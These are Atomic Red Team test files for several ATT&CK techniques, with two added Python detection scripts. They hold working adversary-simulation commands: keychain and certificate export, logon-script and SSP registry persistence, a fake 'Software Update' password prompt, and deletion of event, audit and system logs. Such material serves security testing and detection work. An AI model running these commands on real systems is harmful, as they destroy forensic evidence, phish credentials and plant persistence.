21 | 22 | ## Atomic Test #1 - Keychain 23 | ### Keychain Files 24 | 25 | ~/Library/Keychains/ 26 | 27 | /Library/Keychains/ 28 | 29 | /Network/Library/Keychains/ 30 | 31 | [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) 32 | 33 | [Keychain dumper](https://github.com/juuso/keychaindump) 34 | 35 | **Supported Platforms:** macOS 36 | 37 | 38 | #### Run it with `sh`! 39 | ``` 40 | security -h 41 | security find-certificate -a -p > allcerts.pem 42 | security import /tmp/certs.pem -k 43 | ``` 44 |
45 | -------------------------------------------------------------------------------- /tests/T1037/T1037.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1037 3 | display_name: Logon Scripts 4 | tactic: Lateral Movement, Persistence 5 | description: Windows logon scripts can be run whenever a specific user or group of users log into a system. The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. 6 | 7 | atomic_tests: 8 | - name: Logon Scripts 9 | description: | 10 | Added Via Reg.exe 11 | 12 | supported_platforms: 13 | - windows 14 | - macos 15 | 16 | input_arguments: 17 | script_command: 18 | description: Command To Execute 19 | type: String 20 | default: cmd.exe /c calc.exe 21 | 22 | executor_cmd: 23 | name: command_prompt 24 | command: | 25 | REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "cmd.exe /c calc" /f 26 | REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f 27 | 28 | executor_pwr: 29 | name: powershell 30 | command: | 31 | New-ItemProperty -Path "HKCU:\Environment" -Name UserInitMprLogonScript -Value 'cmd.exe' -PropertyType MultiString -Force 32 | Remove-ItemProperty -Path "HKCU:\Environment" -Name UserInitMprLogonScript -Force 33 | 34 | executor_nix: 35 | name: manual 36 | steps: | 37 | 1. Create the required plist file 38 | sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist 39 | 40 | 2. Populate the plist with the location of your shell script 41 | sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh 42 | 43 | 3. 
Create the required plist file in the target user's Preferences directory 44 | touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist 45 | 46 | 4. Populate the plist with the location of your shell script 47 | defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh 48 | -------------------------------------------------------------------------------- /tests/T1037/T1037.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1037 3 | display_name: Logon Scripts 4 | tactic: Lateral Movement, Persistence 5 | description: Windows logon scripts can be run whenever a specific user or group of users log into a system. The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. 6 | 7 | atomic_tests: 8 | - name: Logon Scripts 9 | description: | 10 | Added Via Reg.exe 11 | 12 | supported_platforms: 13 | - windows 14 | - macos 15 | 16 | input_arguments: 17 | script_command: 18 | description: Command To Execute 19 | type: String 20 | default: cmd.exe /c calc.exe 21 | 22 | executor_cmd: 23 | name: command_prompt 24 | command: | 25 | REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "cmd.exe /c calc" /f 26 | REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f 27 | 28 | executor_pwr: 29 | name: powershell 30 | command: | 31 | New-ItemProperty -Path "HKCU:\Environment" -Name UserInitMprLogonScript -Value 'cmd.exe' -PropertyType MultiString -Force 32 | Remove-ItemProperty -Path "HKCU:\Environment" -Name UserInitMprLogonScript -Force 33 | 34 | executor_nix: 35 | name: manual 36 | steps: | 37 | 1. Create the required plist file 38 | sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist 39 | 40 | 2. 
Populate the plist with the location of your shell script 41 | sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh 42 | 43 | 3. Create the required plist file in the target user's Preferences directory 44 | touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist 45 | 46 | 4. Populate the plist with the location of your shell script 47 | defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh 48 | -------------------------------------------------------------------------------- /tests/T1101/T1101.md: -------------------------------------------------------------------------------- 1 | # T1101 - Security Support Provider 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1101) 3 |
Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. 4 | (Citation: Graeber 2014)
5 | 6 | ## Atomic Tests 7 | 8 | - [Atomic Test #1 - Modify SSP configuration in registry](#atomic-test-1---modify-ssp-configuration-in-registry) 9 | 10 | 11 |
12 | 13 | ## Atomic Test #1 - Modify SSP configuration in registry 14 | Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. 15 | **Supported Platforms:** Windows 16 | 17 | 18 | #### Inputs 19 | | Name | Description | Type | Default Value | 20 | |------|-------------|------|---------------| 21 | | fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp| 22 | 23 | #### Run it with `powershell`! 24 | ``` 25 | # run these in sequence 26 | $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' 27 | $SecurityPackagesUpdated = $SecurityPackages 28 | $SecurityPackagesUpdated += "#{fake_ssp_dll}" 29 | Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated 30 | 31 | # revert (before reboot) 32 | Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages 33 | ``` 34 |
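An audit of the registry values touched by the T1004 (Winlogon Shell, Userinit, Notify), T1037 (UserInitMprLogonScript) and T1101 (Security Packages) tests above, written as an added Python example that is not part of the Atomic Red Team repository. The allowed-entry baselines are assumed clean-host defaults and should be adjusted per Windows build; the snapshot is constructed to look like a host after the tests have run and before their cleanup.

```python
"""Audit of the registry values that the T1004 (Winlogon), T1037 (logon
script) and T1101 (SSP) tests above modify. Added example, not part of the
Atomic Red Team repository. audit() works on a snapshot dict so it runs
offline; read_live_snapshot() fills the same dict via winreg on Windows.
"""
import sys

WINLOGON = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
LSA = r"SYSTEM\CurrentControlSet\Control\Lsa"

# (hive, key, value name) -> expectation on a clean host.
# "absent": the value should not exist (per-user Winlogon/logon-script overrides).
# "list":   every entry must be in the allowed set (assumed defaults; adjust per build).
CHECKS = {
    ("HKLM", WINLOGON, "Shell"):    {"kind": "list", "allowed": {"explorer.exe"}},
    ("HKLM", WINLOGON, "Userinit"): {"kind": "list",
                                     "allowed": {r"c:\windows\system32\userinit.exe"}},
    ("HKCU", WINLOGON, "Shell"):    {"kind": "absent"},
    ("HKCU", WINLOGON, "Userinit"): {"kind": "absent"},
    ("HKCU", WINLOGON + r"\Notify", "logon"): {"kind": "absent"},
    ("HKCU", "Environment", "UserInitMprLogonScript"): {"kind": "absent"},
    ("HKLM", LSA, "Security Packages"): {"kind": "list",
        "allowed": {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u"}},
}


def entries(value):
    """Normalise REG_SZ ("a, b") or REG_MULTI_SZ (["a", "b"]) into lower-case entries."""
    parts = value if isinstance(value, list) else str(value).split(",")
    cleaned = (p.strip().strip('"').lower() for p in parts)
    return {p for p in cleaned if p}


def audit(snapshot):
    """Return human-readable findings for values that deviate from CHECKS."""
    findings = []
    for (hive, key, name), rule in CHECKS.items():
        value = snapshot.get((hive, key, name))
        where = f"{hive}\\{key}\\{name}"
        if rule["kind"] == "absent":
            if value not in (None, "", []):
                findings.append(f"{where} is set: {value!r}")
        elif value is not None:
            extra = entries(value) - rule["allowed"]
            if extra:
                findings.append(f"{where} has unexpected entries: {sorted(extra)}")
    return findings


def read_live_snapshot():
    """Collect the checked values from the live registry (Windows only)."""
    import winreg
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    snapshot = {}
    for hive, key, name in CHECKS:
        try:
            with winreg.OpenKey(hives[hive], key) as handle:
                snapshot[(hive, key, name)] = winreg.QueryValueEx(handle, name)[0]
        except OSError:
            pass  # key or value absent, which is the clean state for most checks
    return snapshot


# Constructed snapshot: a host after the three tests above have run and
# before their cleanup steps.
SAMPLE_SNAPSHOT = {
    ("HKLM", WINLOGON, "Shell"): "explorer.exe",
    ("HKLM", WINLOGON, "Userinit"): r"C:\Windows\system32\userinit.exe,",
    ("HKCU", WINLOGON, "Shell"): r"explorer.exe, C:\Windows\System32\cmd.exe",
    ("HKCU", "Environment", "UserInitMprLogonScript"): ["cmd.exe /c calc"],
    ("HKLM", LSA, "Security Packages"): ["kerberos", "msv1_0", "schannel",
                                         "wdigest", "tspkg", "pku2u", "not-a-ssp"],
}

if __name__ == "__main__":
    snap = read_live_snapshot() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    for line in audit(snap):
        print(line)
```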
-------------------------------------------------------------------------------- /tests/T1141/T1141.md: -------------------------------------------------------------------------------- 1 | # T1141 - Input Prompt 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1141) 3 |
When programs are executed that need more privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript: 4 | 5 | set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "") 6 | (Citation: OSX Keydnap malware) 7 | 8 | Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite. (Citation: OSX Malware Exploits MacKeeper) 9 | 10 | Detection: This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to detect. Monitor process execution for unusual programs as well as AppleScript that could be used to prompt users for credentials. 11 | 12 | Platforms: macOS 13 | 14 | Data Sources: User interface, Process Monitoring 15 | 16 | Permissions Required: User
17 | 18 | ## Atomic Tests 19 | 20 | - [Atomic Test #1 - Prompt User for Password](#atomic-test-1---prompt-user-for-password) 21 | 22 | 23 |
24 | 25 | ## Atomic Test #1 - Prompt User for Password 26 | Prompt User for Password (Local Phishing) 27 | Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html 28 | 29 | **Supported Platforms:** macOS 30 | 31 | 32 | #### Run it with `sh`! 33 | ``` 34 | osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' 35 | ``` 36 |
37 | -------------------------------------------------------------------------------- /tests/T1070/T1070.md: -------------------------------------------------------------------------------- 1 | # T1070 - Indicator Removal on Host 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070) 3 |
Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred. 4 | 5 | Detection: File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system will require different detection mechanisms. 6 | 7 | Platforms: Linux, macOS, Windows 8 | 9 | Data Sources: File monitoring, Process command-line parameters, Process monitoring 10 | 11 | Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems
12 | 13 | ## Atomic Tests 14 | 15 | - [Atomic Test #1 - Clear Logs](#atomic-test-1---clear-logs) 16 | 17 | - [Atomic Test #2 - FSUtil](#atomic-test-2---fsutil) 18 | 19 | - [Atomic Test #3 - rm -rf](#atomic-test-3---rm--rf) 20 | 21 | 22 |
23 | 24 | ## Atomic Test #1 - Clear Logs 25 | Clear Windows Event Logs 26 | 27 | **Supported Platforms:** Windows 28 | 29 | 30 | #### Inputs 31 | | Name | Description | Type | Default Value | 32 | |------|-------------|------|---------------| 33 | | log_name | Windows Log Name, ex System | String | System| 34 | 35 | #### Run it with `command_prompt`! 36 | ``` 37 | wevtutil cl #{log_name} 38 | ``` 39 |
40 |
41 | 42 | ## Atomic Test #2 - FSUtil 43 | Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. 44 | 45 | **Supported Platforms:** Windows 46 | 47 | 48 | #### Run it with `command_prompt`! 49 | ``` 50 | fsutil usn deletejournal /D C: 51 | ``` 52 |
53 |
54 | 55 | ## Atomic Test #3 - rm -rf 56 | Delete system and audit logs 57 | 58 | **Supported Platforms:** macOS, Linux 59 | 60 | 61 | #### Run it with `sh`! 62 | ``` 63 | rm -rf /private/var/log/system.log* 64 | rm -rf /private/var/audit/* 65 | ``` 66 |
67 | -------------------------------------------------------------------------------- /tests/T1064/T1064.md: -------------------------------------------------------------------------------- 1 | # T1064 - Scripting 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1064) 3 |
Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts. 4 | 5 | Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution to software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries rely on macros being allowed or on the user accepting the prompt to activate them. 6 | 7 | Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit), Veil (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)
8 | 9 | ## Atomic Tests 10 | 11 | - [Atomic Test #1 - Create and Execute Bash Shell Script](#atomic-test-1---create-and-execute-bash-shell-script) 12 | 13 | 14 |
15 | 16 | ## Atomic Test #1 - Create and Execute Bash Shell Script 17 | Creates and executes a simple bash script. 18 | 19 | **Supported Platforms:** macOS, Linux 20 | 21 | 22 | #### Run it with `sh`! 23 | ``` 24 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" 25 | sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" 26 | chmod +x /tmp/art.sh 27 | sh /tmp/art.sh 28 | ``` 29 |
-------------------------------------------------------------------------------- /tests/T1151/T1151.md: -------------------------------------------------------------------------------- 1 | # T1151 - Space after Filename 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1151) 3 |
Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back). 4 | 5 | Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious. 6 | 7 | Detection: It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious. 8 | 9 | Platforms: Linux, macOS 10 | 11 | Data Sources: File monitoring, Process Monitoring 12 | 13 | Permissions Required: User 14 | 15 | Contributors: Erye Hernandez, Palo Alto Networks
16 | 17 | ## Atomic Tests 18 | 19 | - [Atomic Test #1 - Space After Filename](#atomic-test-1---space-after-filename) 20 | 21 | 22 |
23 | 24 | ## Atomic Test #1 - Space After Filename 25 | Space After Filename 26 | 27 | **Supported Platforms:** macOS 28 | 29 | 30 | #### Run it with these steps! 31 | 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt 32 | 33 | 2. mv execute.txt "execute.txt " 34 | 35 | 3. ./execute.txt\ 36 | 37 | 38 |
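A file-monitoring check for the indicator the Detection paragraph above names (a trailing space in a filename), written as an added Python example that is not part of the Atomic Red Team repository. It assumes a POSIX filesystem, since Windows strips trailing spaces from names; the sample files it creates are constructed, modelled on the test's `execute.txt `.

```python
"""Scanner for the T1151 indicator: filenames that end in whitespace, with a
look at the first bytes to tell a disguised Mach-O, ELF or shebang script from
a harmless text file. Added example, not part of the Atomic Red Team
repository; assumes a POSIX filesystem.
"""
import os
import stat
import tempfile

# Mach-O magic numbers (32/64-bit, both byte orders) plus the fat-binary header.
MACHO_MAGICS = {b"\xfe\xed\xfa\xce", b"\xfe\xed\xfa\xcf", b"\xca\xfe\xba\xbe",
                b"\xce\xfa\xed\xfe", b"\xcf\xfa\xed\xfe"}


def content_kind(path):
    """Classify a file by its first bytes: 'script', 'mach-o', 'elf' or 'other'."""
    with open(path, "rb") as fh:
        head = fh.read(4)
    if head[:2] == b"#!":
        return "script"
    if head in MACHO_MAGICS:
        return "mach-o"
    if head == b"\x7fELF":
        return "elf"
    return "other"


def scan(root):
    """Walk `root` and report regular files whose name ends in whitespace."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name == name.rstrip():
                continue  # normal name, nothing to report
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
                if not stat.S_ISREG(mode):
                    continue  # skip symlinks, sockets and the like
                kind = content_kind(path)
            except OSError:
                continue
            findings.append({"path": path, "name": name, "kind": kind,
                             "exec_bit": bool(mode & stat.S_IXUSR),
                             "extension": os.path.splitext(name.rstrip())[1]})
    return findings


def make_sample(root=None):
    """Create constructed files: the test's 'execute.txt ', a benign 'notes.txt ',
    and a normally named script that must not be reported."""
    root = root or tempfile.mkdtemp(prefix="t1151-")
    script = os.path.join(root, "execute.txt ")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\necho hello from a text file\n")
    os.chmod(script, 0o755)
    with open(os.path.join(root, "notes.txt "), "w") as fh:
        fh.write("just a note\n")
    with open(os.path.join(root, "normal.txt"), "w") as fh:
        fh.write("#!/bin/sh\necho untouched\n")
    return root


if __name__ == "__main__":
    for f in scan(make_sample()):
        flag = "SUSPICIOUS" if f["kind"] != "other" or f["exec_bit"] else "check"
        print(f"{flag}: {f['name']!r} looks like {f['kind']} (ext {f['extension']})")
```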
39 | -------------------------------------------------------------------------------- /tests/T1145/T1145.md: -------------------------------------------------------------------------------- 1 | # T1145 - Private Keys 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1145) 3 |
Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto) 4 | 5 | Adversaries may gather private keys from compromised systems for use in authenticating to Remote Services like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on *nix-based systems or C:\Users\(username)\.ssh\ on Windows. 6 | 7 | Private keys should require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line. 8 | 9 | Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia) 10 | 11 | Detection: Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication. 12 | 13 | Platforms: Linux, Windows, macOS 14 | 15 | Data Sources: File monitoring 16 | 17 | Permissions Required: User 18 | 19 | Contributors: Itzik Kotler, SafeBreach
20 | 21 | ## Atomic Tests 22 | 23 | - [Atomic Test #1 - Private Keys](#atomic-test-1---private-keys) 24 | 25 | 26 |
27 | 28 | ## Atomic Test #1 - Private Keys 29 | Find private keys on the Windows file system. 30 | 31 | File extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc 32 | 33 | **Supported Platforms:** Windows 34 | 35 | 36 | #### Run it with `command_prompt`! 37 | ``` 38 | echo "ATOMICREDTEAM" > %windir%\cert.key 39 | dir c:\ /b /s .key | findstr /e .key 40 | ``` 41 |
42 | -------------------------------------------------------------------------------- /tests/T1062/T1062.md: -------------------------------------------------------------------------------- 1 | # T1062 - Hypervisor 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1062) 3 |
A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption. 4 | 5 | Detection: Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006) 6 | 7 | Platforms: Windows 8 | 9 | Data Sources: System calls 10 | 11 | Permissions Required: Administrator, SYSTEM
12 | 13 | ## Atomic Tests 14 | 15 | - [Atomic Test #1 - Installing Hyper-V Feature](#atomic-test-1---installing-hyper-v-feature) 16 | 17 | 18 |
19 | 20 | ## Atomic Test #1 - Installing Hyper-V Feature 21 | PowerShell command to check if Hyper-V is installed. 22 | Install the Hyper-V feature. 23 | Create a new VM with New-VM. 24 | 25 | **Supported Platforms:** Windows 26 | 27 | 28 | #### Inputs 29 | | Name | Description | Type | Default Value | 30 | |------|-------------|------|---------------| 31 | | hostname | Host to query to see if Hyper-V feature is installed. | string | test-vm| 32 | | vm_name | Create a new VM. | string | testvm| 33 | | file_location | Location of new VHDX file | string | C:\Temp\test.vhdx| 34 | 35 | #### Run it with `powershell`! 36 | ``` 37 | Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname} 38 | Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools 39 | New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480 40 | ``` 41 |
42 | -------------------------------------------------------------------------------- /tests/T1035/T1035.md: -------------------------------------------------------------------------------- 1 | # T1035 - Service Execution 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1035) 3 |
Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation. 4 | 5 | Detection: Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool PsExec. 6 | 7 | Platforms: Windows 8 | 9 | Data Sources: Windows Registry, Process command-line parameters, Process monitoring 10 | 11 | Permissions Required: Administrator, SYSTEM 12 | 13 | Remote Support: Yes
14 | 15 | ## Atomic Tests 16 | 17 | - [Atomic Test #1 - Execute a Command as a Service](#atomic-test-1---execute-a-command-as-a-service) 18 | 19 | 20 |
21 | 22 | ## Atomic Test #1 - Execute a Command as a Service 23 | Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when the code executes properly. 24 | 25 | **Supported Platforms:** Windows 26 | 27 | 28 | #### Inputs 29 | | Name | Description | Type | Default Value | 30 | |------|-------------|------|---------------| 31 | | service_name | Name of service to create | string | ARTService| 32 | | executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt| 33 | 34 | #### Run it with `command_prompt`! 35 | ``` 36 | sc.exe create #{service_name} binPath= #{executable_command} 37 | sc.exe start #{service_name} 38 | sc.exe delete #{service_name} 39 | ``` 40 |
41 | --------------------------------------------------------------------------------